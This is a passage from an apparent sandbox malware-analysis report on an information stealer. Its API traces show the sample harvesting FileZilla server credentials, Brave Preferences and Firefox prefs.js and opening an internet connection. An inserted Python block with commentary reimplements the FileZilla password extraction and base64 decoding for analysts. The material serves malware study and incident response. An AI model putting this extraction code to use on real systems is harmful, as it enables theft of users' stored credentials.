                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\*.*
                                  • API String ID: 1006159827-1013718255
                                  • Opcode ID: 2ddbf3af10480f1001e604767cd33069587943e031ba210ba6c5095372e1c5ed
                                  • Instruction ID: 52d12505eb021a7734e1bdf6983550efc47555c310649d96735b22528d0ed320
                                  • Opcode Fuzzy Hash: 2ddbf3af10480f1001e604767cd33069587943e031ba210ba6c5095372e1c5ed
                                  • Instruction Fuzzy Hash: D2629D319206579BDB21EF64CC89FEEB7B9AF44340F148628F849A7251DB34DE25CB90
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C6995
                                  • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 002C69C8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C6A02
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C6A29
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C6A34
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C6A5D
                                  • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 002C6A77
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C6A99
                                  • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 002C6AA5
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C6AD0
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C6B00
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 002C6B35
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C6B9D
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C6BCD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                  • API String ID: 313953988-555421843
                                  • Opcode ID: ac6ebf02838c8347403c237dab6b0389ca0020d2da2fd19f19d6e30714e535a5
                                  • Instruction ID: 99dc565d1ebda2ba6be8b5f962a46abb22811d0f2dca772f2ce9c7df9dd7db12
                                  • Opcode Fuzzy Hash: ac6ebf02838c8347403c237dab6b0389ca0020d2da2fd19f19d6e30714e535a5
                                  • Instruction Fuzzy Hash: 09428F70A20246ABDB11AFB0DC89FAE7779AF44740F144529F946EB282DB34DD25CB50
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002BDBC1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BDBE4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002BDBEF
                                  • lstrlen.KERNEL32(002E4CA8), ref: 002BDBFA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BDC17
                                  • lstrcat.KERNEL32(00000000,002E4CA8), ref: 002BDC23
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BDC4C
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002BDC8F
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002BDCBF
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 002BDCD0
                                  • StrCmpCA.SHLWAPI(?,002E17A0), ref: 002BDCF0
                                  • StrCmpCA.SHLWAPI(?,002E17A4), ref: 002BDD0A
                                  • lstrlen.KERNEL32(002DCFEC), ref: 002BDD1D
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002BDD47
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BDD70
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002BDD7B
                                  • lstrlen.KERNEL32(002E1794), ref: 002BDD86
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BDDA3
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002BDDAF
                                  • lstrlen.KERNEL32(?), ref: 002BDDBC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BDDDF
                                  • lstrcat.KERNEL32(00000000,?), ref: 002BDDED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BDE19
                                  • lstrlen.KERNEL32(002E1794), ref: 002BDE3D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002BDE6F
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002BDE7B
                                  • lstrlen.KERNEL32(011C90F8), ref: 002BDE8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BDEB0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002BDEBB
                                  • lstrlen.KERNEL32(002E1794), ref: 002BDEC6
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002BDEE6
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002BDEF2
                                  • lstrlen.KERNEL32(011C9228), ref: 002BDF01
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BDF27
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002BDF32
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BDF5E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BDFA5
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002BDFB1
                                  • lstrlen.KERNEL32(011C90F8), ref: 002BDFC0
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BDFE9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002BDFF4
                                  • lstrlen.KERNEL32(002E1794), ref: 002BDFFF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002BE022
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002BE02E
                                  • lstrlen.KERNEL32(011C9228), ref: 002BE03D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BE063
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002BE06E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BE09A
                                  • StrCmpCA.SHLWAPI(?,Brave), ref: 002BE0CD
                                  • StrCmpCA.SHLWAPI(?,Preferences), ref: 002BE0E7
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002BE11F
                                  • lstrlen.KERNEL32(011CD688), ref: 002BE12E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002BE155
                                  • lstrcat.KERNEL32(00000000,?), ref: 002BE15D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BE19F
                                  • lstrcat.KERNEL32(00000000), ref: 002BE1A9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BE1D0
                                  • CopyFileA.KERNEL32(00000000,?,00000001), ref: 002BE1F9
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002BE22F
                                  • lstrlen.KERNEL32(011C9248), ref: 002BE23D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002BE261
                                  • lstrcat.KERNEL32(00000000,011C9248), ref: 002BE269
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 002BE988
                                  • FindClose.KERNEL32(00000000), ref: 002BE997
                                   Memory Dump Source
                                   • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                                  • String ID: Brave$Preferences$\Brave\Preferences
                                  • API String ID: 1346089424-1230934161
                                  • Opcode ID: 7604c332cec60189ccd2a8748243577bd4b3d12c2ccd9c14b743f60127e47ec2
                                  • Instruction ID: 16233afd37169bc860a332ed7c1ca20013fa202ae1cbe6b0d6463c9ac81be601
                                  • Opcode Fuzzy Hash: 7604c332cec60189ccd2a8748243577bd4b3d12c2ccd9c14b743f60127e47ec2
                                  • Instruction Fuzzy Hash: A3528C709217479BDF21EF64DC89AEE77B9AF44380F154028F84AAB251DB34DC25CB90
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B60FF
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002B6152
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002B6185
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002B61B5
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002B61F0
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002B6223
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 002B6233
                                   Memory Dump Source
                                   • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: the same sixteen .sdmp regions listed under the first function entry above
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Similarity
                                  • API ID: lstrcpy$InternetOpen
                                  • String ID: "$------
                                  • API String ID: 2041821634-2370822465
                                  • Opcode ID: d6f5ac04921945910576f616593ca1e7397bcb951ca1aaa027f97395cfc25d82
                                  • Instruction ID: dd40ee259994e1602c7d34e9f40ffcf04c6d62f06f472e0b19c6b25535f34640
                                  • Opcode Fuzzy Hash: d6f5ac04921945910576f616593ca1e7397bcb951ca1aaa027f97395cfc25d82
                                  • Instruction Fuzzy Hash: C65270719206569BDB21EFB4DC89AEE77B9AF44380F144024F849EB252DB38EC15CF94
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C6B9D
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C6BCD
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C6BFD
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C6C2F
                                  • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 002C6C3C
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 002C6C43
                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 002C6C5A
                                  • lstrlen.KERNEL32(00000000), ref: 002C6C65
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C6CA8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C6CCF
                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 002C6CE2
                                  • lstrlen.KERNEL32(00000000), ref: 002C6CED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C6D30
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C6D57
                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 002C6D6A
                                  • lstrlen.KERNEL32(00000000), ref: 002C6D75
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C6DB8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C6DDF
                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 002C6DF2
                                  • lstrlen.KERNEL32(00000000), ref: 002C6E01
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C6E49
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C6E71
                                  • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 002C6E94
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 002C6EA8
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 002C6EC9
                                  • LocalFree.KERNEL32(00000000), ref: 002C6ED4
                                  • lstrlen.KERNEL32(?), ref: 002C6F6E
                                  • lstrlen.KERNEL32(?), ref: 002C6F81
                                   Memory Dump Source
                                   • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: the same sixteen .sdmp regions listed under the first function entry above
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                                  • API String ID: 2641759534-2314656281
                                  • Opcode ID: 430ba283c9e8457014ed82731328c887c836be7b14ddbbf2dce66e1948ccf17d
                                  • Instruction ID: 62be46527967e072371eb9208c3ec0e38d0f5aad384a0f778667f9f3e6c4dd5e
                                  • Opcode Fuzzy Hash: 430ba283c9e8457014ed82731328c887c836be7b14ddbbf2dce66e1948ccf17d
                                  • Instruction Fuzzy Hash: 8A028F70A20256AFDB11AFB0DC8DFAE7B79AF04740F144569F846EB282DB34DD258B50
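The API sequence in the entry above is the FileZilla credential harvester: StrStrA locates the `<Host>`, `<Port>`, `<User>` and `<Pass encoding="base64">` tags, lstrlen/lstrcpy copy out the text that follows each one, and CryptStringToBinaryA is called with dwFlags 1 (CRYPT_STRING_BASE64) to decode the password. The Python below reproduces that extraction logic so an analyst can see exactly what the stealer recovers from a FileZilla profile. It is an added example written for this page, not code from the sample or from Joe Sandbox. The XML fragment, hosts and credentials are constructed; the record layout is an assumption, since the report only shows the labels `browser: FileZilla`, `login: `, `password: `, `profile: null` and `url:`, not their order or how host and port are joined.

```python
import base64
import binascii

# Constructed sample in the layout FileZilla uses for sitemanager.xml /
# recentservers.xml. Hosts and credentials are made up for this example.
SAMPLE_FILEZILLA_XML = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.66.4" platform="windows">
  <Servers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>alice</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
      <Name>Work FTP</Name>
    </Server>
    <Server>
      <Host>sftp.internal.test</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <User>deploy</User>
      <Pass encoding="base64">UEBzc3cwcmQh</Pass>
    </Server>
    <Server>
      <Host>legacy.example.test</Host>
      <Port>21</Port>
      <User>bob</User>
      <Pass>plaintext-legacy</Pass>
    </Server>
  </Servers>
</FileZilla3>
"""

# Exact byte string the sample passes to StrStrA (see the trace above).
PASS_TAG = '<Pass encoding="base64">'


def _tag_text(block, open_tag, close_tag):
    """Text between open_tag and the next close_tag, or None.

    Mirrors the StrStrA -> lstrlen -> lstrcpy pattern in the trace: a plain
    substring search with no XML parsing at all.
    """
    start = block.find(open_tag)
    if start == -1:
        return None
    start += len(open_tag)
    end = block.find(close_tag, start)
    if end == -1:
        return None
    return block[start:end]


def _decode_pass(b64):
    """Equivalent of CryptStringToBinaryA(..., CRYPT_STRING_BASE64, ...).
    Returns None when the text is not valid base64, as the API call would fail."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def extract_filezilla_entries(xml_text):
    """Walk every <Host> block and pull host, port, user and decoded password."""
    entries = []
    pos = xml_text.find("<Host>")
    while pos != -1:
        nxt = xml_text.find("<Host>", pos + len("<Host>"))
        block = xml_text[pos:nxt] if nxt != -1 else xml_text[pos:]
        b64 = _tag_text(block, PASS_TAG, "</Pass>")
        entries.append({
            "host": _tag_text(block, "<Host>", "</Host>"),
            "port": _tag_text(block, "<Port>", "</Port>"),
            "user": _tag_text(block, "<User>", "</User>"),
            # None when the element is absent or lacks the encoding attribute:
            # the exact-tag search never sees an untagged <Pass> element.
            "password": _decode_pass(b64) if b64 is not None else None,
        })
        pos = nxt
    return entries


def format_record(entry):
    """Render one entry with the field labels seen in the report's String ID.
    Field order and the ftp://host:port form are assumptions of this example."""
    return (
        "browser: FileZilla\n"
        "profile: null\n"
        f"url: ftp://{entry['host']}:{entry['port']}\n"
        f"login: {entry['user'] or ''}\n"
        f"password: {entry['password'] or ''}\n"
    )


if __name__ == "__main__":
    for e in extract_filezilla_entries(SAMPLE_FILEZILLA_XML):
        print(format_record(e))
```

The third server in the sample shows the practical consequence of the exact-tag search: a `<Pass>` element without the `encoding="base64"` attribute is never matched, so that entry is exfiltrated with an empty password. The two tagged entries decode to the cleartext credentials with nothing more than a base64 decode, which is why a FileZilla profile on a host that ran this sample should be treated as fully compromised.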
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C4B51
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C4B74
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C4B7F
                                  • lstrlen.KERNEL32(002E4CA8), ref: 002C4B8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C4BA7
                                  • lstrcat.KERNEL32(00000000,002E4CA8), ref: 002C4BB3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C4BDE
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 002C4BFA
                                   Memory Dump Source
                                   • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: the same sixteen .sdmp regions listed under the first function entry above
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                  • String ID: prefs.js
                                  • API String ID: 2567437900-3783873740
                                  • Opcode ID: 28d72d2a8b6553aa82b279de52e06ee19f103b17cbb42462b36f7ddf24047222
                                  • Instruction ID: fb0df2cfa585c6a8fc56b26968574f11652f675e7f758549dfa9df5a2cbf3512
                                  • Opcode Fuzzy Hash: 28d72d2a8b6553aa82b279de52e06ee19f103b17cbb42462b36f7ddf24047222
                                  • Instruction Fuzzy Hash: 4D924270A21652CFDB24DF19C988F6AB7E5AF44314F1981ADE8099B3A2D771EC91CF40
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C1291
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C12B4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C12BF
                                  • lstrlen.KERNEL32(002E4CA8), ref: 002C12CA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C12E7
                                  • lstrcat.KERNEL32(00000000,002E4CA8), ref: 002C12F3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C131E
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 002C133A
                                  • StrCmpCA.SHLWAPI(?,002E17A0), ref: 002C135C
                                  • StrCmpCA.SHLWAPI(?,002E17A4), ref: 002C1376
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C13AF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C13D7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C13E2
                                  • lstrlen.KERNEL32(002E1794), ref: 002C13ED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C140A
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002C1416
                                  • lstrlen.KERNEL32(?), ref: 002C1423
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1443
                                  • lstrcat.KERNEL32(00000000,?), ref: 002C1451
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C147A
                                  • StrCmpCA.SHLWAPI(?,011CD670), ref: 002C14A3
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C14E4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C150D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1535
                                  • StrCmpCA.SHLWAPI(?,011CD9B0), ref: 002C1552
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C1593
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C15BC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C15E4
                                  • StrCmpCA.SHLWAPI(?,011CD520), ref: 002C1602
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1633
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C165C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C1685
                                  • StrCmpCA.SHLWAPI(?,011CD550), ref: 002C16B3
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C16F4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C171D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1745
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C1796
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C17BE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C17F5
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 002C181C
                                  • FindClose.KERNEL32(00000000), ref: 002C182B
                                   Memory Dump Source
                                   • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: the same sixteen .sdmp regions listed under the first function entry above
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                  • String ID:
                                  • API String ID: 1346933759-0
                                  • Opcode ID: d02627e0ef265e74ee8f3c2ed997d04033b629c09d991abb561a0717b7bd3490
                                  • Instruction ID: 3576fd4f0b4216c32c9b0f0dba3c1503c2ca5cad9f662c7266ed0a9a563893b9
                                  • Opcode Fuzzy Hash: d02627e0ef265e74ee8f3c2ed997d04033b629c09d991abb561a0717b7bd3490
                                  • Instruction Fuzzy Hash: C91274709207479BDB24EF74D88AEAE77B8AF45340F54462CF84AD7252DB34DC258B90
                                  APIs
                                  • wsprintfA.USER32 ref: 002CCBFC
                                  • FindFirstFileA.KERNEL32(?,?), ref: 002CCC13
                                  • lstrcat.KERNEL32(?,?), ref: 002CCC5F
                                  • StrCmpCA.SHLWAPI(?,002E17A0), ref: 002CCC71
                                  • StrCmpCA.SHLWAPI(?,002E17A4), ref: 002CCC8B
                                  • wsprintfA.USER32 ref: 002CCCB0
                                  • PathMatchSpecA.SHLWAPI(?,011C9118), ref: 002CCCE2
                                  • CoInitialize.OLE32(00000000), ref: 002CCCEE
                                    • Part of subcall function 002CCAE0: CoCreateInstance.COMBASE(002DB110,00000000,00000001,002DB100,?), ref: 002CCB06
                                    • Part of subcall function 002CCAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 002CCB46
                                    • Part of subcall function 002CCAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 002CCBC9
                                  • CoUninitialize.COMBASE ref: 002CCD09
                                  • lstrcat.KERNEL32(?,?), ref: 002CCD2E
                                  • lstrlen.KERNEL32(?), ref: 002CCD3B
                                  • StrCmpCA.SHLWAPI(?,002DCFEC), ref: 002CCD55
                                  • wsprintfA.USER32 ref: 002CCD7D
                                  • wsprintfA.USER32 ref: 002CCD9C
                                  • PathMatchSpecA.SHLWAPI(?,?), ref: 002CCDB0
                                  • wsprintfA.USER32 ref: 002CCDD8
                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 002CCDF1
                                  • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 002CCE10
                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 002CCE28
                                  • CloseHandle.KERNEL32(00000000), ref: 002CCE33
                                  • CloseHandle.KERNEL32(00000000), ref: 002CCE3F
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002CCE54
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CCE94
                                  • FindNextFileA.KERNEL32(?,?), ref: 002CCF8D
                                  • FindClose.KERNEL32(?), ref: 002CCF9F
                                   Memory Dump Source
                                   • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: the same sixteen .sdmp regions listed under the first function entry above
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Similarity
                                  • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                                  • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                                  • API String ID: 3860919712-2388001722
                                  • Opcode ID: e18aa7784ab1c6b675d9cec5eb2929abab1e9053404870597d176a77ca784344
                                  • Instruction ID: 4b5362cf2867e493e4750e7b2e4803844110e9be28d59c7f21eb50f3dd227089
                                  • Opcode Fuzzy Hash: e18aa7784ab1c6b675d9cec5eb2929abab1e9053404870597d176a77ca784344
                                  • Instruction Fuzzy Hash: 62C160719202599BDF60EF64DC85FEE7779AF48300F1445ADF50AA7281DA30AE94CFA0
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C1291
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C12B4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C12BF
                                  • lstrlen.KERNEL32(002E4CA8), ref: 002C12CA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C12E7
                                  • lstrcat.KERNEL32(00000000,002E4CA8), ref: 002C12F3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C131E
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 002C133A
                                  • StrCmpCA.SHLWAPI(?,002E17A0), ref: 002C135C
                                  • StrCmpCA.SHLWAPI(?,002E17A4), ref: 002C1376
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C13AF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C13D7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C13E2
                                  • lstrlen.KERNEL32(002E1794), ref: 002C13ED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C140A
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002C1416
                                  • lstrlen.KERNEL32(?), ref: 002C1423
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1443
                                  • lstrcat.KERNEL32(00000000,?), ref: 002C1451
